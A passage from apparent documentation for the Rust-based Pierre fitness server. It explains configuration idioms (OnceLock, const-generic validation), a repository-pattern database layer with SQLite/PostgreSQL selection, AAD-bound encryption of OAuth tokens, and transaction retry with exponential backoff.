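As a quick sanity check, the formulas above can be exercised with concrete ages. This is a simplified, std-only version of the dispatch; the `Gender` type and the behavior for out-of-range ages are assumptions for illustration:

```rust
#[derive(Clone, Copy, PartialEq)]
enum Gender {
    Male,
    Female,
}

/// Simplified max-HR dispatch (assumes age < 220 for the Fox formula).
fn max_hr(age: u32, gender: Gender, algorithm: &str) -> u16 {
    match algorithm {
        // Fox: 220 - age
        "fox" => (220 - age) as u16,
        // Nes: 211 - 0.64 × age
        "nes" => (211.0 - 0.64 * f64::from(age)) as u16,
        // Gulati (women): 206 - 0.88 × age
        "gulati" if gender == Gender::Female => (206.0 - 0.88 * f64::from(age)) as u16,
        // Tanaka (also the default): 208 - 0.7 × age
        _ => (208.0 - 0.7 * f64::from(age)) as u16,
    }
}
```

For a 30-year-old, Fox gives 190 bpm, Tanaka 187 bpm, and Gulati 179 bpm - the spread shows why the algorithm choice is worth exposing as configuration.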
Benefits of algorithm selection:
- Scientific accuracy: Different formulas for different populations
- Research validation: Can A/B test algorithms
- Backwards compatibility: Can maintain old algorithm while testing new ones
- User customization: Advanced users can choose preferred formulas
Reference: See docs/intelligence-methodology.md for algorithm details
Global Static Configuration with Oncelock
Pierre uses OnceLock for global configuration that’s initialized once at startup.
Source: src/constants/mod.rs (conceptual pattern)
#![allow(unused)]
fn main() {
use std::sync::OnceLock;
/// Global server configuration (initialized once at startup)
static SERVER_CONFIG: OnceLock<ServerConfig> = OnceLock::new();
/// Initialize global configuration (call once at startup)
pub fn init_server_config() -> AppResult<()> {
let config = ServerConfig::from_env()?;
SERVER_CONFIG.set(config)
.map_err(|_| AppError::internal("Config already initialized"))?;
Ok(())
}
/// Get immutable reference to server config (call after init)
pub fn get_server_config() -> &'static ServerConfig {
SERVER_CONFIG.get()
.expect("Server config not initialized - call init_server_config() first")
}
}
Rust Idioms Explained:
- `OnceLock<T>` - thread-safe lazy initialization (Rust 1.70+)
  - Can be set exactly once
  - Returns `&'static T` after initialization
  - Replaces the older `lazy_static!` macro
- Static lifetime `&'static`
  - Reference valid for the entire program duration
  - No need to pass config around everywhere
  - Can be shared across threads safely
- Initialization pattern
  - Call `init_server_config()` once in `main()`
  - All other code calls `get_server_config()`
  - Panics if accessed before initialization (intentional - a programming error)
Usage in binary:
Source: src/bin/pierre-mcp-server.rs:119
#[tokio::main]
async fn main() -> Result<()> {
// Initialize static server configuration
pierre_mcp_server::constants::init_server_config()?;
info!("Static server configuration initialized");
// Rest of application can now use get_server_config()
// ... build `config` (e.g. via ServerConfig::from_env()), then:
bootstrap_server(config).await
}
Accessing global config:
#![allow(unused)]
fn main() {
use crate::constants::get_server_config;
fn some_function() -> Result<()> {
let config = get_server_config();
println!("HTTP port: {}", config.http_port);
Ok(())
}
}
When to use global config:
- ✅ Read-only configuration - never changes after startup
- ✅ Widely used values - accessed from many modules
- ✅ Performance critical - avoids passing around large structs
- ❌ Mutable state - use `Arc<Mutex<T>>` or message passing instead
- ❌ Request-scoped data - use function parameters or context structs
Reference: Rust std::sync::OnceLock
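A minimal runnable version of the same pattern, with the struct and function names simplified from the conceptual code above:

```rust
use std::sync::OnceLock;

#[derive(Debug)]
struct Config {
    http_port: u16,
}

static CONFIG: OnceLock<Config> = OnceLock::new();

/// First call wins; `OnceLock::set` hands a later value back in `Err`
/// instead of overwriting, so double-initialization is detectable.
fn init_config(port: u16) -> Result<(), Config> {
    CONFIG.set(Config { http_port: port })
}

/// Returns a `&'static` reference; panics if called before `init_config`.
fn get_config() -> &'static Config {
    CONFIG.get().expect("config not initialized - call init_config() first")
}
```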
Const Generics for Compile-Time Validation
Pierre uses const generics to track validation state at compile time.
Source: src/config/intelligence_config.rs:135-150
#![allow(unused)]
fn main() {
/// Main intelligence configuration container
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct IntelligenceConfig<const VALIDATED: bool = false> {
pub recommendation_engine: RecommendationEngineConfig,
pub performance_analyzer: PerformanceAnalyzerConfig,
pub goal_engine: GoalEngineConfig,
// ... more fields
}
impl IntelligenceConfig<false> {
/// Validate configuration and return validated version
pub fn validate(self) -> Result<IntelligenceConfig<true>, ConfigError> {
// Validate all fields
self.recommendation_engine.validate()?;
self.performance_analyzer.validate()?;
// ... more validation
// Return with VALIDATED = true
Ok(IntelligenceConfig::<true> {
recommendation_engine: self.recommendation_engine,
performance_analyzer: self.performance_analyzer,
// ... copy all fields
})
}
}
// Only validated configs can be used
impl IntelligenceConfig<true> {
pub fn use_in_production(&self) {
// Only callable on validated config
}
}
}
Rust Idioms Explained:
- Const generic parameter `<const VALIDATED: bool>`
  - Type parameter with a constant value
  - `IntelligenceConfig<false>` and `IntelligenceConfig<true>` are different types
  - The type system enforces validation
- Type-state pattern
  - Uses types to represent state-machine states
  - `false` = unvalidated, `true` = validated
  - The compiler prevents using an unvalidated config in production
- Default const generic `<const VALIDATED: bool = false>`
  - `IntelligenceConfig` without a generic argument defaults to `<false>`
  - Convenient for API consumers
Usage example:
#![allow(unused)]
fn main() {
// Load config (unvalidated)
let config: IntelligenceConfig<false> = load_from_env();
// This would compile-time error (config is unvalidated):
// config.use_in_production();
// Validate config
let validated_config: IntelligenceConfig<true> = config.validate()?;
// Now we can use it (compile-time enforced)
validated_config.use_in_production();
}
Reference: Rust Reference - Const Generics
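The type-state idea compiles standalone in a few lines. This sketch uses a single hypothetical `max_heart_rate` field rather than Pierre's actual config fields:

```rust
// Minimal sketch of the type-state pattern with a const generic VALIDATED flag.
#[derive(Debug, Clone)]
struct Config<const VALIDATED: bool = false> {
    max_heart_rate: u16,
}

impl Config<false> {
    fn new(max_heart_rate: u16) -> Self {
        Self { max_heart_rate }
    }

    /// Consumes the unvalidated config; returns the validated type on success.
    fn validate(self) -> Result<Config<true>, String> {
        if self.max_heart_rate == 0 || self.max_heart_rate > 250 {
            return Err(format!("implausible max HR: {}", self.max_heart_rate));
        }
        Ok(Config::<true> { max_heart_rate: self.max_heart_rate })
    }
}

impl Config<true> {
    /// Only callable on a validated config -- enforced by the type system.
    fn max_heart_rate(&self) -> u16 {
        self.max_heart_rate
    }
}

fn main() {
    let raw = Config::<false>::new(185);
    // raw.max_heart_rate(); // would not compile: method only exists on Config<true>
    let validated = raw.validate().unwrap();
    assert_eq!(validated.max_heart_rate(), 185);
    assert!(Config::<false>::new(0).validate().is_err());
}
```

Because `validate` takes `self` by value, the unvalidated config is consumed; there is no way to keep using the old `Config<false>` after validation.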
Diagram: Configuration Layers
┌─────────────────────────────────────────────────────────────┐
│ Configuration Layers │
└─────────────────────────────────────────────────────────────┘
┌─────────────────┐
│ Binary Launch │
└────────┬────────┘
│
▼
┌───────────────────────────┐
│ 1. Load .envrc (dev) │
│ dotenvy::dotenv() │
└───────────┬───────────────┘
│
▼
┌───────────────────────────┐
│ 2. Parse Environment │
│ ServerConfig::from_env()│
└───────────┬───────────────┘
│
▼
┌────────────────────┼────────────────────┐
│ │ │
▼ ▼ ▼
┌─────────────────┐ ┌─────────────────┐ ┌──────────────────┐
│ Type-Safe Enums │ │ Algorithm Config│ │ Database Config │
│ - LogLevel │ │ - TSS variants │ │ - SQLite/Postgres│
│ - Environment │ │ - MaxHR variants│ │ - Type-safe URL │
└─────────────────┘ └─────────────────┘ └──────────────────┘
│ │ │
└────────────────────┼────────────────────┘
│
▼
┌───────────────────────────┐
│ 3. Validate Config │
│ IntelligenceConfig │
│ <VALIDATED = true> │
└───────────┬───────────────┘
│
▼
┌───────────────────────────┐
│ 4. Initialize Global │
│ OnceLock::set(config) │
└───────────┬───────────────┘
│
▼
┌───────────────────────────┐
│ 5. Application Runtime │
│ get_server_config() │
└───────────────────────────┘
Rust Idioms Summary
| Idiom | Purpose | Example Location |
|---|---|---|
| `#[derive(Default)]` with `#[default]` | Mark default enum variant | src/config/environment.rs:21 |
| `#[serde(rename_all = "...")]` | Customize serialization format | src/config/environment.rs:20 |
| `#[serde(default = "function")]` | Custom default per field | src/config/intelligence_config.rs:78 |
| `matches!` macro | Pattern matching to bool | src/config/environment.rs:100 |
| `.strip_prefix()` method | Safe string prefix removal | src/config/environment.rs:151 |
| Enum variants with data | Different data per variant | src/config/environment.rs:128-140 |
| `OnceLock<T>` | Thread-safe lazy static | src/constants/mod.rs |
| Const generics | Compile-time state tracking | src/config/intelligence_config.rs:137 |
Key Takeaways
- Environment variables for flexibility - Runtime configuration without recompilation
- Type-safe enums over strings - Compiler catches configuration errors
- `from_str_or_default` pattern - Infallible parsing with sensible defaults
- Algorithm selection via env vars - Runtime choice of sports science formulas
- `OnceLock` for global config - Thread-safe lazy initialization
- Const generics for validation - Type-state pattern enforces validation
- `#[serde(default)]` for resilience - Graceful handling of missing fields
Next Chapter
Chapter 4: Dependency Injection with Context Pattern - Learn how Pierre avoids the “AppState” anti-pattern with focused dependency injection contexts.
Database Architecture & Repository Pattern
This chapter explores Pierre’s database architecture using the repository pattern with 13 focused repository traits following SOLID principles.
Repository Pattern Architecture
Pierre uses a repository pattern to provide focused, cohesive interfaces for database operations:
┌────────────────────────────────────────────────────────┐
│ Database (Core) │
│ Provides accessor methods for repositories │
└────────────────────────────────────────────────────────┘
│
┌────────────────┴────────────────┐
│ │
▼ ▼
┌──────────────┐ ┌──────────────┐
│ SQLite │ │ PostgreSQL │
│ Implementation│ │Implementation│
│ │ │ │
│ - Local dev │ │ - Production │
│ - Testing │ │ - Cloud │
│ - Embedded │ │ - Scalable │
└──────────────┘ └──────────────┘
│ │
└───────────────┬───────────────┘
│
┌───────────────┴───────────────┐
│ 13 Repository Traits │
├────────────────────────────────┤
│ • UserRepository │
│ • OAuthTokenRepository │
│ • ApiKeyRepository │
│ • UsageRepository │
│ • A2ARepository │
│ • ProfileRepository │
│ • InsightRepository │
│ • AdminRepository │
│ • TenantRepository │
│ • SecurityRepository │
│ • NotificationRepository │
│ • OAuth2ServerRepository │
│ • FitnessConfigRepository │
└────────────────────────────────┘
Why repository pattern?
The repository pattern follows SOLID principles:
- Single Responsibility: Each repository handles one domain (users, tokens, keys, etc.)
- Interface Segregation: Consumers depend only on the methods they need
- Testability: Mock individual repositories independently
- Maintainability: Changes isolated to specific repositories
Each of the 13 repository traits contains 5-20 cohesive methods for its domain.
Repository Accessor Pattern
The Database struct provides accessor methods that return repository implementations:
Source: src/database/mod.rs:139-230
#![allow(unused)]
fn main() {
impl Database {
/// Get UserRepository for user account management
#[must_use]
pub fn users(&self) -> repositories::UserRepositoryImpl {
repositories::UserRepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
/// Get OAuthTokenRepository for OAuth token storage
#[must_use]
pub fn oauth_tokens(&self) -> repositories::OAuthTokenRepositoryImpl {
repositories::OAuthTokenRepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
/// Get ApiKeyRepository for API key management
#[must_use]
pub fn api_keys(&self) -> repositories::ApiKeyRepositoryImpl {
repositories::ApiKeyRepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
/// Get UsageRepository for usage tracking and analytics
#[must_use]
pub fn usage(&self) -> repositories::UsageRepositoryImpl {
repositories::UsageRepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
/// Get A2ARepository for Agent-to-Agent management
#[must_use]
pub fn a2a(&self) -> repositories::A2ARepositoryImpl {
repositories::A2ARepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
/// Get ProfileRepository for user profiles and goals
#[must_use]
pub fn profiles(&self) -> repositories::ProfileRepositoryImpl {
repositories::ProfileRepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
/// Get InsightRepository for AI-generated insights
#[must_use]
pub fn insights(&self) -> repositories::InsightRepositoryImpl {
repositories::InsightRepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
/// Get AdminRepository for admin token management
#[must_use]
pub fn admins(&self) -> repositories::AdminRepositoryImpl {
repositories::AdminRepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
/// Get TenantRepository for multi-tenant management
#[must_use]
pub fn tenants(&self) -> repositories::TenantRepositoryImpl {
repositories::TenantRepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
/// Get SecurityRepository for security and key rotation
#[must_use]
pub fn security(&self) -> repositories::SecurityRepositoryImpl {
repositories::SecurityRepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
/// Get NotificationRepository for OAuth notifications
#[must_use]
pub fn notifications(&self) -> repositories::NotificationRepositoryImpl {
repositories::NotificationRepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
/// Get OAuth2ServerRepository for OAuth 2.0 server
#[must_use]
pub fn oauth2_server(&self) -> repositories::OAuth2ServerRepositoryImpl {
repositories::OAuth2ServerRepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
/// Get FitnessConfigRepository for fitness configuration
#[must_use]
pub fn fitness_configs(&self) -> repositories::FitnessConfigRepositoryImpl {
repositories::FitnessConfigRepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
}
}
Usage pattern:
#![allow(unused)]
fn main() {
// Repository pattern - access through typed accessors
let user = database.users().get_by_id(user_id).await?;
let token = database.oauth_tokens().get(user_id, tenant_id, provider).await?;
let keys = database.api_keys().list_by_user(user_id).await?;
}
Benefits:
- Clarity: `database.users().create(...)` is clearer than `database.create_user(...)`
- Cohesion: Related methods grouped together
- Testability: Can mock individual repositories
- Interface Segregation: Only depend on repositories you use
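The testability benefit can be shown with an in-memory mock. This is a simplified synchronous sketch (Pierre's real repositories are async traits); the `User` shape and `greeting` function are illustrative, not from the codebase:

```rust
use std::collections::HashMap;

#[derive(Clone, Debug, PartialEq)]
struct User {
    id: u32,
    email: String,
}

// A narrow, focused interface: consumers depend only on this.
trait UserRepository {
    fn get_by_id(&self, id: u32) -> Option<User>;
}

// Production impls would hit SQLite/PostgreSQL; this in-memory mock is for tests.
struct MockUserRepository {
    users: HashMap<u32, User>,
}

impl UserRepository for MockUserRepository {
    fn get_by_id(&self, id: u32) -> Option<User> {
        self.users.get(&id).cloned()
    }
}

// Business logic depends only on the trait, not on the whole database.
fn greeting(repo: &dyn UserRepository, id: u32) -> String {
    match repo.get_by_id(id) {
        Some(user) => format!("Hello, {}", user.email),
        None => "Unknown user".to_string(),
    }
}

fn main() {
    let mut users = HashMap::new();
    users.insert(1, User { id: 1, email: "a@example.com".to_string() });
    let repo = MockUserRepository { users };
    assert_eq!(greeting(&repo, 1), "Hello, a@example.com");
    assert_eq!(greeting(&repo, 2), "Unknown user");
}
```

Because `greeting` accepts `&dyn UserRepository`, the test never touches a real database, and swapping backends cannot change its behavior.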
The 13 Repository Traits
1. UserRepository - User Account Management
Source: src/database/repositories/mod.rs:68-108
#![allow(unused)]
fn main() {
/// User account management repository
#[async_trait]
pub trait UserRepository: Send + Sync {
/// Create a new user account
async fn create(&self, user: &User) -> Result<Uuid, DatabaseError>;
/// Get user by ID
async fn get_by_id(&self, id: Uuid) -> Result<Option<User>, DatabaseError>;
/// Get user by email address
async fn get_by_email(&self, email: &str) -> Result<Option<User>, DatabaseError>;
/// Get user by email (required - fails if not found)
async fn get_by_email_required(&self, email: &str) -> Result<User, DatabaseError>;
/// Update user's last active timestamp
async fn update_last_active(&self, id: Uuid) -> Result<(), DatabaseError>;
/// Get total number of users
async fn get_count(&self) -> Result<i64, DatabaseError>;
/// Get users by status (pending, active, suspended)
async fn list_by_status(&self, status: &str) -> Result<Vec<User>, DatabaseError>;
/// Get users by status with cursor-based pagination
async fn list_by_status_paginated(
&self,
status: &str,
pagination: &PaginationParams,
) -> Result<CursorPage<User>, DatabaseError>;
/// Update user status and approval information
async fn update_status(
&self,
id: Uuid,
new_status: UserStatus,
approved_by: Option<Uuid>,
) -> Result<User, DatabaseError>;
/// Update user's tenant_id to link them to a tenant
async fn update_tenant_id(&self, id: Uuid, tenant_id: &str) -> Result<(), DatabaseError>;
}
}
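The cursor-based pagination in `list_by_status_paginated` works by remembering the last id returned and fetching rows past it. The following sketch models this over integer ids; the `PaginationParams`/`CursorPage` shapes here are illustrative, not Pierre's exact types:

```rust
// Hypothetical simplified types modeling cursor-based pagination.
struct PaginationParams {
    cursor: Option<u32>, // id of the last item on the previous page
    limit: usize,
}

struct CursorPage<T> {
    items: Vec<T>,
    next_cursor: Option<u32>,
}

/// Return up to `limit` ids greater than the cursor, in order.
fn paginate(ids: &[u32], params: &PaginationParams) -> CursorPage<u32> {
    let start = params.cursor.unwrap_or(0);
    let items: Vec<u32> = ids
        .iter()
        .copied()
        .filter(|&id| id > start)
        .take(params.limit)
        .collect();
    // A full page means there may be more rows; a short page is the last one.
    let next_cursor = if items.len() == params.limit {
        items.last().copied()
    } else {
        None
    };
    CursorPage { items, next_cursor }
}

fn main() {
    let ids = [1, 2, 3, 4, 5];
    let page1 = paginate(&ids, &PaginationParams { cursor: None, limit: 2 });
    assert_eq!(page1.items, vec![1, 2]);
    assert_eq!(page1.next_cursor, Some(2));
    let page2 = paginate(&ids, &PaginationParams { cursor: page1.next_cursor, limit: 2 });
    assert_eq!(page2.items, vec![3, 4]);
    let page3 = paginate(&ids, &PaginationParams { cursor: page2.next_cursor, limit: 2 });
    assert_eq!(page3.items, vec![5]);
    assert_eq!(page3.next_cursor, None);
}
```

Unlike offset pagination, a cursor stays stable when rows are inserted before the current position, which matters for admin list views over live data.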
2. OAuthTokenRepository - OAuth Token Storage (Tenant-scoped)
Source: src/database/repositories/mod.rs:110-160
#![allow(unused)]
fn main() {
/// OAuth token storage repository (tenant-scoped)
#[async_trait]
pub trait OAuthTokenRepository: Send + Sync {
/// Store or update user OAuth token for a tenant-provider combination
async fn upsert(&self, token: &UserOAuthToken) -> Result<(), DatabaseError>;
/// Get user OAuth token for a specific tenant-provider combination
async fn get(
&self,
user_id: Uuid,
tenant_id: &str,
provider: &str,
) -> Result<Option<UserOAuthToken>, DatabaseError>;
/// Get all OAuth tokens for a user across all tenants
async fn list_by_user(&self, user_id: Uuid) -> Result<Vec<UserOAuthToken>, DatabaseError>;
/// Get all OAuth tokens for a tenant-provider combination
async fn list_by_tenant_provider(
&self,
tenant_id: &str,
provider: &str,
) -> Result<Vec<UserOAuthToken>, DatabaseError>;
/// Delete user OAuth token for a tenant-provider combination
async fn delete(
&self,
user_id: Uuid,
tenant_id: &str,
provider: &str,
) -> Result<(), DatabaseError>;
/// Delete all OAuth tokens for a user (when user is deleted)
async fn delete_all_for_user(&self, user_id: Uuid) -> Result<(), DatabaseError>;
/// Update OAuth token expiration and refresh info
async fn refresh(
&self,
user_id: Uuid,
tenant_id: &str,
provider: &str,
access_token: &str,
refresh_token: Option<&str>,
expires_at: Option<DateTime<Utc>>,
) -> Result<(), DatabaseError>;
}
}
3. ApiKeyRepository - API Key Management
Source: src/database/repositories/mod.rs:162-200
#![allow(unused)]
fn main() {
/// API key management repository
#[async_trait]
pub trait ApiKeyRepository: Send + Sync {
/// Create a new API key
async fn create(&self, key: &ApiKey) -> Result<(), DatabaseError>;
/// Get API key by key hash
async fn get_by_hash(&self, key_hash: &str) -> Result<Option<ApiKey>, DatabaseError>;
/// Get API key by ID
async fn get_by_id(&self, id: &str) -> Result<Option<ApiKey>, DatabaseError>;
/// List all API keys for a user
async fn list_by_user(&self, user_id: Uuid) -> Result<Vec<ApiKey>, DatabaseError>;
/// Revoke an API key
async fn revoke(&self, id: &str) -> Result<(), DatabaseError>;
/// Update API key last used timestamp
async fn update_last_used(&self, id: &str) -> Result<(), DatabaseError>;
/// Record API key usage
async fn record_usage(&self, usage: &ApiKeyUsage) -> Result<(), DatabaseError>;
/// Get usage statistics for an API key
async fn get_usage_stats(&self, key_id: &str) -> Result<ApiKeyUsageStats, DatabaseError>;
}
}
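Note that lookup is by `key_hash`, not by the raw key: only a hash of each API key is persisted, and authenticating a request means hashing the presented key and looking that up. The sketch below models this with std's `DefaultHasher` purely for illustration; production code uses a cryptographic hash (e.g. SHA-256), which std does not provide.

```rust
use std::collections::hash_map::DefaultHasher;
use std::collections::HashMap;
use std::hash::{Hash, Hasher};

// Illustrative only: DefaultHasher is NOT cryptographic. Real API key
// storage must use a cryptographic hash such as SHA-256.
fn hash_key(raw_key: &str) -> String {
    let mut hasher = DefaultHasher::new();
    raw_key.hash(&mut hasher);
    format!("{:016x}", hasher.finish())
}

fn main() {
    // The database stores only key_hash -> key_id; the raw key never persists.
    let mut keys: HashMap<String, &str> = HashMap::new();
    keys.insert(hash_key("pk_live_abc123"), "key-1");

    // Authenticating a request: hash the presented key, then look it up.
    assert_eq!(keys.get(&hash_key("pk_live_abc123")), Some(&"key-1"));
    assert_eq!(keys.get(&hash_key("pk_live_wrong")), None);
}
```

A leaked database dump then reveals only hashes, and the server never needs to (and cannot) show the raw key again after creation.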
4-13. Other Repository Traits
The remaining repositories follow the same focused pattern:
- UsageRepository: JWT usage tracking, API request analytics
- A2ARepository: Agent-to-Agent task management, client registration
- ProfileRepository: User profiles, fitness goals, activities
- InsightRepository: AI-generated insights and recommendations
- AdminRepository: Admin token management, authorization
- TenantRepository: Multi-tenant management, tenant creation
- SecurityRepository: Key rotation, encryption key management
- NotificationRepository: OAuth callback notifications
- OAuth2ServerRepository: OAuth 2.0 server (client registration, tokens)
- FitnessConfigRepository: User fitness configuration storage
Complete trait definitions: src/database/repositories/mod.rs
Factory Pattern for Database Selection
Pierre automatically detects and instantiates the correct database backend:
Source: src/database_plugins/factory.rs:38-46
#![allow(unused)]
fn main() {
/// Database instance wrapper that delegates to the appropriate implementation
#[derive(Clone)]
pub enum Database {
/// SQLite database instance
SQLite(SqliteDatabase),
/// PostgreSQL database instance (requires postgresql feature)
#[cfg(feature = "postgresql")]
PostgreSQL(PostgresDatabase),
}
}
Automatic detection:
Source: src/database_plugins/factory.rs:164-184
#![allow(unused)]
fn main() {
/// Automatically detect database type from connection string
pub fn detect_database_type(database_url: &str) -> Result<DatabaseType> {
if database_url.starts_with("sqlite:") {
Ok(DatabaseType::SQLite)
} else if database_url.starts_with("postgresql://") || database_url.starts_with("postgres://") {
#[cfg(feature = "postgresql")]
return Ok(DatabaseType::PostgreSQL);
#[cfg(not(feature = "postgresql"))]
return Err(AppError::config(
"PostgreSQL connection string detected, but PostgreSQL support is not enabled. \
Enable the 'postgresql' feature flag in Cargo.toml",
)
.into());
} else {
Err(AppError::config(format!(
"Unsupported database URL format: {database_url}. \
Supported formats: sqlite:path/to/db.sqlite, postgresql://user:pass@host/db"
))
.into())
}
}
}
Usage:
#![allow(unused)]
fn main() {
// Automatically selects SQLite or PostgreSQL based on URL
let database = Database::new(
"sqlite:users.db", // or "postgresql://localhost/pierre"
encryption_key,
).await?;
}
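A condensed, runnable version of the detection logic (with the feature-flag branches removed and a plain `String` error) behaves as follows:

```rust
// Standalone sketch mirroring detect_database_type's URL-prefix matching.
#[derive(Debug, PartialEq)]
enum DatabaseType {
    SQLite,
    PostgreSQL,
}

fn detect_database_type(url: &str) -> Result<DatabaseType, String> {
    if url.starts_with("sqlite:") {
        Ok(DatabaseType::SQLite)
    } else if url.starts_with("postgresql://") || url.starts_with("postgres://") {
        Ok(DatabaseType::PostgreSQL)
    } else {
        Err(format!("unsupported database URL format: {url}"))
    }
}

fn main() {
    assert_eq!(detect_database_type("sqlite:users.db"), Ok(DatabaseType::SQLite));
    assert_eq!(
        detect_database_type("postgres://localhost/pierre"),
        Ok(DatabaseType::PostgreSQL)
    );
    // Unknown schemes fail loudly instead of guessing a backend.
    assert!(detect_database_type("mysql://localhost/db").is_err());
}
```

Both `postgresql://` and the shorter `postgres://` scheme are accepted, since tooling in the PostgreSQL ecosystem emits either form.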
Feature Flags for Database Backends
Pierre uses Cargo feature flags for conditional compilation:
Source: Cargo.toml (conceptual)
[features]
default = ["sqlite"]
sqlite = []
postgresql = ["sqlx/postgres"]
[dependencies]
sqlx = { version = "0.7", features = ["runtime-tokio-rustls", "sqlite", "macros", "migrate"] }
Conditional compilation:
Source: src/database_plugins/factory.rs:44-45
#![allow(unused)]
fn main() {
/// PostgreSQL database instance (requires postgresql feature)
#[cfg(feature = "postgresql")]
PostgreSQL(PostgresDatabase),
}
Build commands:
# SQLite (default)
cargo build
# PostgreSQL
cargo build --features postgresql
# Both (for testing)
cargo build --all-features
AAD-Based Encryption for OAuth Tokens
Pierre encrypts OAuth tokens with Additional Authenticated Data (AAD) binding:
Source: src/database_plugins/shared/encryption.rs:12-47
#![allow(unused)]
fn main() {
/// Create AAD (Additional Authenticated Data) context for token encryption
///
/// Format: "{tenant_id}|{user_id}|{provider}|{table}"
///
/// This prevents cross-tenant token reuse attacks by binding the encrypted
/// token to its specific context. If an attacker copies an encrypted token
/// to a different tenant/user/provider context, decryption will fail due to
/// AAD mismatch.
#[must_use]
pub fn create_token_aad_context(
tenant_id: &str,
user_id: Uuid,
provider: &str,
table: &str,
) -> String {
format!("{tenant_id}|{user_id}|{provider}|{table}")
}
}
Encryption with AAD:
Source: src/database_plugins/shared/encryption.rs:84-96
#![allow(unused)]
fn main() {
pub fn encrypt_oauth_token<D>(
db: &D,
token: &str,
tenant_id: &str,
user_id: Uuid,
provider: &str,
) -> Result<String>
where
D: HasEncryption,
{
let aad_context = create_token_aad_context(tenant_id, user_id, provider, "user_oauth_tokens");
db.encrypt_data_with_aad(token, &aad_context)
}
}
Security benefits:
- AES-256-GCM: AEAD cipher with authentication
- AAD binding: Token bound to tenant/user/provider context
- Cross-tenant protection: Can’t copy encrypted token to different tenant
- Tampering detection: AAD verification fails if data modified
- Compliance: GDPR, HIPAA, SOC 2 encryption-at-rest requirements
AAD format example:
tenant-123|550e8400-e29b-41d4-a716-446655440000|strava|user_oauth_tokens
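The AAD context itself is just a deterministic string; the security comes from feeding it to the AEAD cipher. This sketch models only the context construction (taking `user_id` as `&str` rather than `Uuid` to stay self-contained):

```rust
// Sketch of AAD context construction. In the real code this string is passed
// to AES-256-GCM as Additional Authenticated Data, so any mismatch between
// encryption-time and decryption-time context makes decryption fail.
fn create_token_aad_context(tenant_id: &str, user_id: &str, provider: &str, table: &str) -> String {
    format!("{tenant_id}|{user_id}|{provider}|{table}")
}

fn main() {
    let aad = create_token_aad_context(
        "tenant-123",
        "550e8400-e29b-41d4-a716-446655440000",
        "strava",
        "user_oauth_tokens",
    );
    assert_eq!(
        aad,
        "tenant-123|550e8400-e29b-41d4-a716-446655440000|strava|user_oauth_tokens"
    );

    // A different tenant produces a different AAD, so a ciphertext copied into
    // another tenant's row cannot be decrypted there.
    let other = create_token_aad_context(
        "tenant-456",
        "550e8400-e29b-41d4-a716-446655440000",
        "strava",
        "user_oauth_tokens",
    );
    assert_ne!(aad, other);
}
```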
Transaction Retry Patterns
Pierre handles database deadlocks and transient errors with exponential backoff:
Source: src/database_plugins/shared/transactions.rs:59-105
#![allow(unused)]
fn main() {
/// Retry a transaction operation if it fails due to deadlock or timeout
///
/// Exponential Backoff:
/// - Attempt 1: 10ms
/// - Attempt 2: 20ms
/// - Attempt 3: 40ms
/// - Attempt 4: 80ms
/// - Attempt 5: 160ms
pub async fn retry_transaction<F, Fut, T>(mut f: F, max_retries: u32) -> Result<T>
where
F: FnMut() -> Fut,
Fut: std::future::Future<Output = Result<T>>,
{
let mut attempts = 0;
loop {
match f().await {
Ok(result) => return Ok(result),
Err(e) => {
attempts += 1;
if attempts >= max_retries {
return Err(e);
}
let error_msg = format!("{e:?}");
if is_retryable_error(&error_msg) {
let backoff_ms = 10 * (1 << attempts);
sleep(Duration::from_millis(backoff_ms)).await;
} else {
// Non-retryable error
return Err(e);
}
}
}
}
}
}
Retryable errors:
Source: src/database_plugins/shared/transactions.rs:120-150
#![allow(unused)]
fn main() {
fn is_retryable_error(error_msg: &str) -> bool {
let error_lower = error_msg.to_lowercase();
// Retryable: Deadlock and locking errors
if error_lower.contains("deadlock")
|| error_lower.contains("database is locked")
|| error_lower.contains("locked")
|| error_lower.contains("busy")
{
return true;
}
// Retryable: Timeout errors
if error_lower.contains("timeout") || error_lower.contains("timed out") {
return true;
}
// Retryable: Serialization failures (PostgreSQL)
if error_lower.contains("serialization failure") {
return true;
}
// Non-retryable: Constraint violations
if error_lower.contains("unique constraint")
|| error_lower.contains("foreign key constraint")
|| error_lower.contains("check constraint")
{
return false;
}
false
}
}
Usage example:
#![allow(unused)]
fn main() {
use crate::database_plugins::shared::transactions::retry_transaction;
retry_transaction(
|| async {
db.users().create(&user).await
},
3 // max retries
).await?;
}
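The retry loop can be exercised synchronously to make the control flow concrete. This sketch drops async/await and the retryability check, keeping the same doubling backoff starting at 10ms:

```rust
use std::time::Duration;

/// Synchronous sketch of retry_transaction: retry up to `max_retries` times
/// with exponential backoff (10ms, 20ms, 40ms, ...).
fn retry<T, E>(mut f: impl FnMut() -> Result<T, E>, max_retries: u32) -> Result<T, E> {
    let mut attempts = 0;
    loop {
        match f() {
            Ok(v) => return Ok(v),
            Err(e) => {
                attempts += 1;
                if attempts >= max_retries {
                    return Err(e);
                }
                let backoff_ms: u64 = 10 << (attempts - 1);
                std::thread::sleep(Duration::from_millis(backoff_ms));
            }
        }
    }
}

fn main() {
    // Fails twice (simulating "database is locked"), succeeds on the third try.
    let mut calls = 0;
    let result = retry(
        || {
            calls += 1;
            if calls < 3 {
                Err("database is locked")
            } else {
                Ok(42)
            }
        },
        5,
    );
    assert_eq!(result, Ok(42));
    assert_eq!(calls, 3);
}
```

The `FnMut() -> Result<T, E>` bound is what lets the closure be invoked repeatedly while mutating captured state, mirroring the `FnMut() -> Fut` bound in the async original.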
Shared Database Utilities
The shared module provides reusable components across backends (880 lines total), eliminating massive code duplication. The refactoring deleted the 3,058-line sqlite.rs wrapper file entirely.
Structure:
src/database_plugins/shared/
